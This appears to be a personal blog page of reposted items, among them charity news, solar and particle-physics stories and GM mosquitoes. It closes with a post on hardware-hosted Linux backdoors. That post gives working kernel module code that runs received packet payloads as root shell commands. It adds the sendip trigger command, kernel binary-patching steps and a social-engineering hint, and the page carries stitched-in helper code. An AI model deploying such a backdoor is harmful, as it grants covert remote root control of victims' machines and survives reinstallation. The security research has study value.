Mayur's Posterous

"Lost" Star Matthew Fox Volunteers in India

Just weeks before the Christmas holidays, “Lost” actor Matthew Fox travelled to India on a medical mission with Operation Smile, meeting hundreds of children suffering from cleft lips and cleft palates who were born into unimaginable poverty.

Photo: Matthew Fox volunteers in India
Actor Matthew Fox volunteered in Guwahati, India, on Operation Smile’s 500 patient medical mission. (Operation Smile Photo – Marc Ascher)

Fox spent his time playing with the children who were awaiting operations. Fox, a father of two, was quickly won over by 5-year-old Sarban.

Sarban showed no fear before his surgery. He said he “just wants his lip to be better.” (Operation Smile Photo – Marc Ascher)

The operation required to repair a cleft lip can take as little as 45 minutes.

After the surgery, the stress and desperation that previously lined the face of Sarban’s father was replaced with pure joy. “When they told me that he was ready for surgery, that moment was the happiest moment in my life,” Sarban’s father said. “Now that I see him, I am the happiest father in the world.” (Operation Smile Photo – Marc Ascher)

Sarban’s smile is healed and his life will never be the same. (Operation Smile Photo – Marc Ascher)

Operation Smile is an international charity with a mobile team of volunteer medical professionals who provide safe, effective reconstructive surgery for children born with facial deformities at no cost. Thanks to their work, more than 150,000 formerly affected children can smile today.

The organization will host its 2nd Annual “Little Black Dress” Fundraiser Event & Cocktail Party at the Viceroy in Miami on Saturday, February 5, 2011 at 8PM.

Celebrities set to attend include former Miami Heat NBA player Tim Hardaway; Syesha Mercado, star of the hit Broadway musical “Dreamgirls”; Super Bowl champion, two-time Pro Bowl selection and former Atlanta Falcons player Gerald Riggs, along with his son, international sports newscaster Gerald Riggs Jr.; Alfred Thomas, supporting actor in “Stomp The Yard”; and Miss Latina International, Esther Dollar.

To find out more about how you can join these celebrities and support the work of Operation Smile, visit OperationSmile.org.

To view more images of Fox’s trip to India, visit their page on Facebook.


Ladies and Gents, our Dr. Jack Shepherd. 


7 billion people on this planet by the end of 2011, a video by National Geographic.


Huge Magnetic Filament Erupts on the Sun | Wired Science

 

A magnetic filament more than 50 times the Earth’s width is erupting off the surface of the sun.

Update 4:25 p.m. EST: The mega-filament collapsed in a gorgeous cascade of hot plasma between noon and 2 p.m. EST. NASA’s Solar Dynamics Observatory captured a beautiful movie of the eruption (above). The explosion does not appear to be aimed at Earth, so we shouldn’t expect any magnetic storms or satellite troubles.

The loop of hot plasma has been snaking around the sun’s southeast limb since Dec. 4, and appears to be growing by the hour. When SDO saw it on Dec. 4, the filament was more than 250,000 miles long, about 30 times the diameter of the Earth. In the image below, taken at about 12:30 p.m. EST on Dec. 6, the loop of charged plasma stretches more than 435,000 miles, the full radius of the sun.

So far the gigantic prominence has hung suspended peacefully above the sun’s surface, but this morning it started showing signs of instability. Long filaments like this one can break apart as coronal mass ejections, releasing tons of hot, charged material into the inner solar system and potentially causing magnetic storms on Earth — although this one seems to be safe.

The image you see is in ultraviolet channels, not visible light. This prominence is an excellent target for backyard telescopes. If you capture any great sun photos in the next few days, let us know.

Images: NASA/SDO

Via spaceweather.com

It is nice knowing that there are things out there that are able to wipe out our planet just the same way you brush an ant off your arm.



Gigantic hidden planet could be hurling comets at the rest of the solar system


Far away in the frozen outermost depths of our solar system, there might be a hidden planet four times the size of Jupiter. This secret companion to the Sun could be responsible for sending comets into the inner solar system.

This idea is an intriguing variation on the old Nemesis theory, which holds that the Sun has a smaller companion star orbiting the outer reaches of the solar system. The Nemesis star was thought to be either a pint-sized red dwarf or a failed star, a brown dwarf, and either way its movements through the Oort Cloud at the furthest edge of our solar system would knock comets out of their orbits. Some of these would hit Earth, leading to mass extinction events. The presence of Nemesis would explain why these extinctions appear to occur in a cyclical fashion.

That's the old theory, which fell apart because (among other things) it turns out Nemesis could not have a stable enough orbit to account for the regular mass extinctions, which is the main reason such an object was hypothesized in the first place. But now University of Louisiana-Lafayette astrophysicists John Matese and Daniel Whitmire have a new theory that holds a rather different kind of companion object is out in the Oort Cloud. Fittingly, they've named it Tyche, who in mythology is the good sister of the evil Nemesis.

So, why should Tyche exist? For one thing, two centuries worth of observation indicate a disproportionate amount of comets originate from the outer regions of the Oort Cloud as opposed to the areas closer to the Sun. A planet anywhere from one to four times the mass of Jupiter could be responsible for the gravitational influence that would create this imbalance. Matese points out that the probability that this effect is purely a statistical fluke is extremely small, which suggests there's something strange going on out there in the outer Oort. Tyche might also be responsible for the unusually elongated orbit of the dwarf planet Sedna.

Matese says the discovery of such a planet would be a huge shock to planetary scientists:

"Most planetary scientists would not be surprised if the largest undiscovered companion was Neptune-sized or smaller, but a Jupiter-mass object would be a surprise. If the conjecture is indeed true, the important implications would relate to how it got there - touching on the early solar environment - and how it might have affected the subsequent distributions of comets and, to a lesser extent, the known planets."

If the planet exists, it would be located some 30,000 astronomical units away, meaning its distance from the Sun is 30,000 times that of Earth. It would be extremely cold, with a temperature of about -73 degrees Celsius. At such a freezing temperature, Tyche would radiate very little heat for us to detect, and its extreme distance would make it incredibly hard to spot. By comparison, Neptune is only 30 astronomical units away, and the Kuiper Belt extends to just 55 AU from the Sun.

There's some hope that we could find Tyche, however. NASA's WISE space telescope might have caught sight of Tyche before its mission ended in October. Actually, we need to hope it spotted the planet twice, as otherwise it would be impossible to corroborate its existence. If WISE, which is the most powerful infrared telescope yet built, could not detect Tyche, then it will be quite a few years before we've got a legitimate chance at seeing it again... assuming it's out there in the first place.

[via Space.com]


Large Hadron Collider detects 'Big Bang' matter


By Emily Chung CBC News
This image shows beams of lead ions colliding, scattering particles. Their signals are measured by the cylindrical ATLAS detector. (CERN)

A phase of matter created moments after the Big Bang is thought to have been detected at the Large Hadron Collider in Switzerland.

"Striking" evidence of a quark-gluon plasma has been observed by a team of researchers, including Canadians, at the facility near Geneva, the European Organization for Nuclear Research (CERN) announced Friday.

What is quark-gluon plasma?

Quarks and gluons are very tiny particles that combine into larger particles called protons. Those in turn combine with electrons to form atoms in the world we know today. However, during the initial moments of the Big Bang, this hadn't yet happened. The temperature was likely 100,000 to a million times what it was at the centre of the sun, and quarks moved freely in a "soup" called a plasma. Physicists hypothesize that as the universe cooled, small groups of quarks separated into individual protons, and as it cooled further, small groups of protons combined with electrons to form individual atoms.

"People have been searching for evidence of this for decades," Canadian physicist Richard Teuscher said Friday from CERN's laboratory. "What's exciting is if this is really true … [it's] the first unambiguous measurement of this condition of the early universe."

The results of the experiment by an international collaboration called ATLAS were accepted Friday morning for publication in the scientific journal Physical Review Letters, less than 24 hours after it was submitted, said Teuscher, a research scientist at the Canadian Institute for Particle Physics and a physics professor at the University of Toronto.

Normally, the peer review process takes weeks or months, added Teuscher, a member of ATLAS who did some of the data analysis for the experiment.

Physicists theorize that a few hundred millionths of a second after the Big Bang (about 14 billion years ago), the universe was made of a quark-gluon plasma — an extremely hot soup of very tiny subatomic particles.

Canadian physicist Richard Teuscher, shown inside the tunnel of the Large Hadron Collider during construction a few years ago, said people have been searching for evidence of quark-gluon plasma for decades. (Matthias Haase/CERN)

The Large Hadron Collider produces extremely high-energy collisions of larger particles, mimicking the Big Bang and potentially reproducing the types of matter that existed during the early moments of the universe.

In this case, researchers spent three weeks smashing lead ions into one another and measuring the resulting signals. Ions are particles produced by adding or removing electrons from atoms. They are charged and can therefore be propelled by an electromagnetic field inside a particle accelerator or collider.

Teuscher likened the colliding ions to two bean bags crashing at extremely high speed, causing their contents to spray out.

"But it doesn't just spray out randomly all over the place," he added.

Instead, two cones or "jets" of particles spray out in opposite directions.

Plasma fireball

The lead ions are so massive and the energy of their collision is so high that it is expected to produce a "fireball" of quark-gluon plasma — "something like the fireball produced at the time of the Big Bang."

Canadian content

Canadians make up more than 150 of the researchers involved in ATLAS. They have mainly been involved with designing, building and operating detectors called liquid argon calorimeters, including the forward calorimeter, under projects funded by the Natural Sciences and Engineering Research Council. Team members include physicists from the University of Alberta, Carleton University, McGill University, University of Montreal, Simon Fraser University, University of Regina, University of Toronto, University of British Columbia, University of Victoria, York University and TRIUMF, Canada's national laboratory for particle and nuclear physics.

One of the jets of particles must pass through the fireball to get out the other side, melting in the process.

As predicted, the data shows that in half the collisions, only one of the two jets can be observed, Teuscher said: "The other jet has been blown to smithereens."

The researchers used two different methods to confirm their results. Teuscher added that another experiment called CMS, which uses different detectors, is reporting similar results, although those haven't yet been published.

Peter Krieger, an associate professor of physics at the University of Toronto, said a detector called the forward calorimeter built in Canada by researchers at the University of Toronto and at Carleton University in Ottawa was a key component in the recent discovery.

It helped confirm that the evidence was the result of a certain type of ion collision, where the two ions strike each other head on instead of grazing each other. The head-on collision releases more energy, and is therefore the type that is predicted to produce a quark-gluon plasma.

Next, ATLAS researchers will be collecting more data and poring through it for different kinds of evidence of quark-gluon plasma.


A cross-section of the cylindrical ATLAS experimental setup is shown on the left. The lines in the centre are tracks left by the jets of particles produced during the collision. The lighter green and red rings are the detectors, while the dark red and green bars (and the graphs at centre and right) represent the signals they detect. Normally, a collision will generate two signal peaks representing two jets, one on either side of the cylinder. However, in this case, one disappears. (ATLAS experiment/CERN)

via cbc.ca

 


For The First Time, Genetically Engineered Mosquitoes Are Released Into The Wild | Popular Science

The transgenic animals are designed to help stamp out dengue fever in the Cayman Islands

Photo: Mosquito (Germán Meyer)

An Oxford-based research firm has announced the results of a release of genetically modified male mosquitoes in the Cayman Islands, the first experiment with GM mosquitoes to take place in the wild.

From May to October of this year, Oxitec released male mosquitoes three times a week in a 40-acre area. The mosquitoes had been genetically modified to be sterile, so that when they mated with the indigenous female mosquitoes there would be no offspring, and the population would shrink.

Mosquito numbers in the region had dropped 80 percent by August, which the researchers expect would result in fewer dengue cases.

Since only female mosquitoes bite humans and transmit diseases such as dengue fever (for which there is no specific treatment), the British biologists suspected that introducing males sterilized by a genetic modification into the gene pool could dramatically decrease mosquito numbers over time.

While many scientists and environmentalists object to killing off mosquitoes entirely for fear it would harm dependent species, Oxitec asserts that, since the sterilizing gene could not be passed on to subsequent generations, this method will have no permanent ecological impact.

Rather, GM males function like an insecticide, temporarily reducing numbers without the negative effects of using chemical toxins. They can also be more effective against insects that have developed resistance to commonly used pesticides. In regions where booming mosquito populations have caused epidemic outbreaks of dengue fever, yellow fever and malaria, dramatically reducing the population temporarily could reduce the death toll and provide valuable lead time to vaccinate and treat hard-hit populations.

As the death toll caused by disease-carrying mosquitoes rises (over 2 million of the 700 million people infected by mosquitoes die annually), science has proposed a wide range of possible solutions to lessen the damage, from lasers to chemicals. But the release of transgenic animals into the wild is a very bold new step.

[AP]

Now all we have to wait for is a zombie apocalypse.



A few years ago, French photographer Sacha Goldberger found his 91-year-old Hungarian grandmother Frederika feeling lonely and depressed. To cheer her up, he suggested that they shoot a series of outrageous photographs in unusual costumes, poses, and locations. Grandma reluctantly agreed, but once they got rolling, she couldn't stop smiling.

Frederika was born in Budapest 20 years before World War II. During the war, at the peril of her own life, she courageously saved the lives of ten people. When asked how, he tells us "she hid the Jewish people she knew, moving them around to different places every day." A survivor of Nazism and Communism, she later emigrated from Hungary to France, forced by the Communist regime to leave her homeland illegally or face death.

Aside from great strength, Frederika has an incredible sense of humor, one that defies time and misfortune. She is funny and cynical, always mocking people that she loves.

With the unexpected success of this series, titled "Mamika," Goldberger created a MySpace page for his grandmother. She now has over 2,200 friends and receives messages like: "You're the grandmother that I have dreamed of, would you adopt me?" and " You made my day, I hope to be like you at your age."

Initially, she did not understand why all these people wrote to congratulate her. Then, little by little, she realized that her story conveyed a message of hope and joy. In all those pictures, she posed with the utmost enthusiasm. Now, after the set, Goldberger shares that his grandmother has never shown even a trace of depression. Perhaps it's because her story serves some sort of purpose. That through the warm words of newfound friends, she's reminded of just how lucky she is to be alive.

Update: We got in touch with Sacha Goldberger, the grandson and talented photographer to ask him more about his background and creative process. He told us this: "I've been photographing for four years now and before that I worked as a creative director. My grandmother is very professional. I'd show her some poses, and she'd propose some of her own. I like to tell stories and I also work with some very creative friends."


10 Strange Things About The Universe

The universe can be a very strange place. While groundbreaking ideas such as quantum theory, relativity and even the Earth going around the Sun might be commonly accepted now, science still continues to show that the universe contains things you might find it difficult to believe, and even more difficult to get your head around.

 

10. Negative Energy


Theoretically, the lowest temperature that can be achieved is absolute zero, exactly −273.15°C, where the motion of all particles stops completely. However, you can never actually cool something to this temperature because, in quantum mechanics, every particle has a minimum energy, called “zero-point energy,” which you cannot get below. Remarkably, this minimum energy doesn’t just apply to particles, but to any vacuum, whose energy is called “vacuum energy.” Showing that this energy exists involves a rather simple experiment: take two metal plates in a vacuum, put them close together, and they will be attracted to each other. This is caused by the field between the plates only being able to resonate at certain frequencies, while outside the plates the vacuum energy can resonate at pretty much any frequency. Because the energy outside the plates is greater than the energy between the plates, the plates are pushed towards each other. As the plates get closer together, the force increases, and at around a 10 nm separation this effect (called the Casimir effect) creates one atmosphere of pressure between them. Because the plates reduce the vacuum energy between them to below the normal zero-point energy, the space is said to have negative energy, which has some unusual properties.

One of the properties of a negative-energy vacuum is that light actually travels faster in it than it does in a normal vacuum, something that may one day allow people to travel faster than the speed of light in a kind of negative-energy vacuum bubble. Negative energy could also be used to hold open a traversable wormhole, which, although theoretically possible, would collapse as soon as it was created without a means to keep it open. Negative energy also causes black holes to evaporate. Vacuum energy is often modeled as virtual particles popping into existence and annihilating. This doesn’t violate any energy conservation laws as long as the particles are annihilated shortly afterwards. However, if two particles are produced at the event horizon of a black hole, one can be moving away from the black hole while the other is falling into it. This means they won’t be able to annihilate, and the one that falls in carries negative energy. When the negative-energy particle falls into the black hole, it lowers the mass of the black hole instead of adding to it, and over time particles like these will cause the black hole to evaporate completely. Because this theory was first suggested by Stephen Hawking, the particles given off by this effect (the ones that don’t fall into the black hole) are called Hawking radiation. It was the first accepted theory to unite quantum theory with general relativity, making it Hawking’s greatest scientific achievement to date.
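As an added check of the 10 nm figure quoted above (a worked calculation added here, not part of the original list), the Casimir pressure between two parallel, perfectly conducting plates separated by a distance $d$ is

$$\frac{F}{A} = \frac{\pi^{2} \hbar c}{240\, d^{4}}$$

With $\hbar c \approx 3.16 \times 10^{-26}\ \mathrm{J\,m}$ the numerator is $\pi^{2}\hbar c / 240 \approx 1.30 \times 10^{-27}\ \mathrm{J\,m}$, so at $d = 10\ \mathrm{nm} = 10^{-8}\ \mathrm{m}$

$$\frac{F}{A} \approx \frac{1.30 \times 10^{-27}}{10^{-32}}\ \mathrm{Pa} \approx 1.3 \times 10^{5}\ \mathrm{Pa},$$

against $1\ \mathrm{atm} = 1.013 \times 10^{5}\ \mathrm{Pa}$. Solving $F/A = 1\ \mathrm{atm}$ for $d$ gives $d \approx 10.6\ \mathrm{nm}$, so "around 10 nm" is right, and because of the $d^{-4}$ dependence the pressure falls by a factor of sixteen each time the gap doubles.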

 

9. Frame Dragging


One prediction of Einstein’s theory of general relativity is that when a large object moves, it drags the space-time around it, causing nearby objects to be pulled along as well. It can occur when a large object is moving in a straight line or is rotating, and, although the effect is very small, it has been experimentally verified. The Gravity Probe B experiment, launched in 2004, was designed to measure the space-time distortion near Earth. Although sources of interference were larger than expected, the frame-dragging effect has been measured to an uncertainty of 15%, with further analysis hoping to reduce this further.

The expected effects were very close to predictions: due to the rotation of the Earth, the probe was pulled from its orbit by around 2 meters per year, an effect purely caused by the mass of the Earth distorting the space-time surrounding it. The probe itself would not feel this extra acceleration because it is not caused by an acceleration on the probe, but rather on the space-time the probe is traveling through–analogous to a rug being pulled under a table, rather than moving the table itself.



Student-designed door could save lives during earthquakes


 


Hosting backdoors in hardware [techies, read this]

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we’re going to describe how we can gain full control of someone’s machine by giving them a piece of hardware which they install into their computer. The backdoor won’t leave any trace on the disk, so it won’t be eliminated even if the operating system is reinstalled. It’s important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I’ll let you figure out the social engineering side of getting the hardware installed (birthday “present”?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We’re going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it’s mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let’s start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We’re going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we’ll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

#include <linux/module.h>
#include <linux/kmod.h>      /* call_usermodehelper() */
#include <linux/skbuff.h>
#include <net/protocol.h>    /* struct net_protocol, inet_add_protocol() */

/* Called by the IP receive path for every protocol-163 packet. By the time
 * the handler runs, skb->data already points past the IP header, so the
 * raw payload is handed to "sh -c" exactly as it arrived on the wire. */
int exec_packet(struct sk_buff *skb)
{
        char *argv[4] = {"/bin/sh", "-c", (char *)skb->data, NULL};
        char *envp[1] = {NULL};

        /* UMH_NO_WAIT: we are in softirq context and must not block */
        call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);

        kfree_skb(skb);   /* we consumed the packet; free it ourselves */
        return 0;
}

We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

/* Table entry for protocol 163; no_policy skips the IPsec policy check */
const struct net_protocol proto163_protocol = {
        .handler = exec_packet,
        .no_policy = 1,
        .netns_ok = 1
};

int init_module(void)
{
        /* inet_add_protocol() returns -1 if the slot is already taken */
        return inet_add_protocol(&proto163_protocol, 163) < 0 ? -EEXIST : 0;
}

/* Deregister on unload, or the kernel keeps a pointer into freed memory */
void cleanup_module(void)
{
        inet_del_protocol(&proto163_protocol, 163);
}

MODULE_LICENSE("GPL");

Let’s build and load the module:

rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
  CC [M]  /home/rwbarton/exec163.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/rwbarton/exec163.mod.o
  LD [M]  /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko

Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x

Great! It worked. Note that we have to send a null-terminated string in the payload, because that’s what call_usermodehelper expects to find in argv and we didn’t add a terminator in exec_packet.
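What sendip actually puts on the wire, and what the kernel hands to exec_packet, is easier to see in user space. The following is an added example, not code from the original post: it builds the same protocol-163 datagram (bare IPv4 header, no transport header, NUL included in the payload), re-parses it the way the IP receive path does before calling the handler, and adds the check a defender would want, namely flagging protocol numbers the host is not expected to speak. The allow-list in is_unexpected_protocol, the addresses and the command string are assumptions made up for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IPV4_HLEN      20   /* header length with no options */
#define PROTO_BACKDOOR 163  /* the unassigned protocol number the post picks */

/* RFC 1071 one's-complement checksum over the IPv4 header. Over a header
 * whose checksum field is already correct it returns 0. */
uint16_t ip_checksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)((buf[i] << 8) | buf[i + 1]);
    if (len & 1)
        sum += (uint32_t)buf[len - 1] << 8;
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Build the datagram `sendip -p ipv4 -ip 163 -f payload` sends: a 20-byte
 * IPv4 header followed directly by the command string. The NUL travels as
 * part of the payload because exec_packet never adds one. Returns length. */
size_t build_proto163_packet(uint8_t *out, size_t cap, const uint8_t saddr[4],
                             const uint8_t daddr[4], const char *cmd)
{
    size_t plen = strlen(cmd) + 1;
    size_t total = IPV4_HLEN + plen;
    uint16_t csum;
    if (total > cap || total > 0xffff)
        return 0;
    memset(out, 0, IPV4_HLEN);
    out[0] = 0x45;                        /* version 4, IHL 5 */
    out[2] = (uint8_t)(total >> 8);
    out[3] = (uint8_t)(total & 0xff);
    out[8] = 64;                          /* TTL */
    out[9] = PROTO_BACKDOOR;
    memcpy(out + 12, saddr, 4);
    memcpy(out + 16, daddr, 4);
    csum = ip_checksum(out, IPV4_HLEN);
    out[10] = (uint8_t)(csum >> 8);
    out[11] = (uint8_t)(csum & 0xff);
    memcpy(out + IPV4_HLEN, cmd, plen);
    return total;
}

/* Mirrors what the IP layer does before calling inet_protos[proto]->handler:
 * sanity-check the header, then hand over everything after it (this is what
 * skb->data points at inside the handler). Returns the protocol, or -1. */
int ipv4_deliver(const uint8_t *pkt, size_t len, const uint8_t **payload, size_t *plen)
{
    size_t ihl, tot;
    if (len < IPV4_HLEN || (pkt[0] >> 4) != 4)
        return -1;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    tot = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < IPV4_HLEN || tot < ihl || tot > len || ip_checksum(pkt, ihl) != 0)
        return -1;
    *payload = pkt + ihl;
    *plen = tot - ihl;
    return pkt[9];
}

/* Detection side: a protocol number this host is not expected to speak
 * deserves an alert. The allow-list (ICMP, IGMP, TCP, UDP, GRE, ESP, AH)
 * is an assumption for the example; tune it to the host. */
int is_unexpected_protocol(int proto)
{
    static const int expected[] = { 1, 2, 6, 17, 47, 50, 51 };
    size_t i;
    for (i = 0; i < sizeof expected / sizeof expected[0]; i++)
        if (expected[i] == proto)
            return 0;
    return 1;
}

/* The handler never appends a terminator, so an unterminated payload would
 * let /bin/sh read past the packet buffer. */
int payload_is_terminated(const uint8_t *p, size_t n)
{
    return n > 0 && memchr(p, '\0', n) != NULL;
}

/* Round trip on a constructed packet; returns 1 if every check passes. */
int selftest(void)
{
    uint8_t buf[128];
    const uint8_t src[4] = { 10, 0, 0, 2 }, dst[4] = { 10, 0, 0, 1 };
    const uint8_t *pl;
    size_t n, pn;

    n = build_proto163_packet(buf, sizeof buf, src, dst, "touch /tmp/x");
    if (n != 33 || buf[9] != PROTO_BACKDOOR || ip_checksum(buf, IPV4_HLEN) != 0)
        return 0;
    if (ipv4_deliver(buf, n, &pl, &pn) != PROTO_BACKDOOR || pn != 13)
        return 0;
    if (!payload_is_terminated(pl, pn) || strcmp((const char *)pl, "touch /tmp/x") != 0)
        return 0;
    if (!is_unexpected_protocol(PROTO_BACKDOOR) || is_unexpected_protocol(6))
        return 0;
    buf[8] = 63;                          /* corrupt the TTL: checksum must fail */
    return ipv4_deliver(buf, n, &pl, &pn) == -1;
}
```

On a real host the same allow-list check can be driven from a packet capture or a netfilter counter per protocol number; a non-zero count for anything outside the expected set is the signal, since the backdoor needs no open port and no TCP or UDP at all.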

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we’re just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it’s called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We’re going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

  1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
  2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
  3. it ran our init_module function.

We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel’s startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module’s code and data, but we need to make our changes before the kernel has started running, so the memory allocator won’t be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we’d still have to find somewhere to store that extra code.

What we’re going to do is cheat and find some data which isn’t used for anything terribly important, and overwrite it with our own data. In general, it’s hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it’s unlikely to ever be triggered. We’ll need well under 180 bytes for our data, so let’s look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep  '^.{180}' | less

One of the output lines is this one:

<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.

This sounds pretty obscure to me, and a Google search doesn’t find any occurrences of this message which aren’t from the kernel source code. So, we’re going to just overwrite it with our data.

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don’t expect the decompression to fail, because we didn’t modify the compressed image at all. So we’ll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.
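The three mechanical steps in this section, finding a long error string to recycle, overwriting it without spilling into neighbouring data, and planting the 5-byte jmp, are ordinary binary-patching primitives. The block below is an added example, not the post's own patching tool: it implements each step over a constructed in-memory image (a fake "kernel" with one 190-byte message followed by a table that must stay intact). The string length threshold and addresses are the post's figures; the sample image and the 0x100/0x200 addresses are made up for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Find the first NUL-terminated run of at least min_len printable bytes in
 * img, which is what `strings vmlinux | egrep '^.{180}'` lists. On success
 * stores the run length (without the NUL) and returns its offset, else -1. */
long find_long_string(const uint8_t *img, size_t len, size_t min_len, size_t *run_len)
{
    size_t start = 0, i;
    for (i = 0; i < len; i++) {
        int printable = (img[i] >= 0x20 && img[i] < 0x7f) || img[i] == '\t';
        if (printable)
            continue;
        if (img[i] == '\0' && i - start >= min_len) {
            *run_len = i - start;
            return (long)start;
        }
        start = i + 1;
    }
    return -1;
}

/* Overwrite the string slot at off (slot_len bytes plus its NUL) with data.
 * Refuses if the data would spill past the terminator into whatever follows,
 * which might be a table the kernel actually reads. */
int overwrite_string_slot(uint8_t *img, size_t len, size_t off, size_t slot_len,
                          const uint8_t *data, size_t data_len)
{
    if (off > len || slot_len + 1 > len - off || data_len > slot_len + 1)
        return -1;
    memcpy(img + off, data, data_len);
    return 0;
}

/* Encode the 5-byte near jump (E9 rel32) the post plants in the decompressor;
 * rel32 is relative to the end of the instruction. Returns bytes written. */
int encode_jmp_rel32(uint8_t *out, uint32_t at, uint32_t target)
{
    uint32_t rel = target - (at + 5);
    out[0] = 0xE9;
    out[1] = (uint8_t)rel;
    out[2] = (uint8_t)(rel >> 8);
    out[3] = (uint8_t)(rel >> 16);
    out[4] = (uint8_t)(rel >> 24);
    return 5;
}

/* Inverse: where does an E9 at `at` land? Returns 0 if p is not a near jmp. */
uint32_t decode_jmp_rel32(const uint8_t *p, uint32_t at)
{
    uint32_t rel;
    if (p[0] != 0xE9)
        return 0;
    rel = (uint32_t)p[1] | ((uint32_t)p[2] << 8) | ((uint32_t)p[3] << 16) | ((uint32_t)p[4] << 24);
    return at + 5 + rel;
}

/* Exercise the helpers on a constructed image: 64 bytes of zeros, a 190-byte
 * message, its NUL, then 16 bytes of "table" that must stay untouched.
 * Returns 1 if every check passes. */
int selftest(void)
{
    uint8_t img[64 + 190 + 1 + 16];
    uint8_t data[200], jmp[5];
    size_t run = 0;
    long off;

    memset(img, 0, sizeof img);
    memset(img + 64, 'A', 190);
    memset(img + 64 + 191, 0x7f, 16);
    memset(data, 0xcc, sizeof data);

    off = find_long_string(img, sizeof img, 180, &run);
    if (off != 64 || run != 190)
        return 0;
    if (overwrite_string_slot(img, sizeof img, (size_t)off, run, data, 150) != 0)
        return 0;
    if (overwrite_string_slot(img, sizeof img, (size_t)off, run, data, 200) != -1)
        return 0;
    if (img[64 + 191] != 0x7f)            /* bytes after the slot are intact */
        return 0;
    encode_jmp_rel32(jmp, 0x100, 0x200);
    if (jmp[0] != 0xE9 || jmp[1] != 0xFB || jmp[2] || jmp[3] || jmp[4])
        return 0;
    return decode_jmp_rel32(jmp, 0x100) == 0x200;
}
```

The same find_long_string scan is a cheap integrity check in the other direction: diffing the strings of a suspect vmlinux or vmlinuz against a known-good copy of the same kernel version shows exactly this kind of overwritten message.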

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

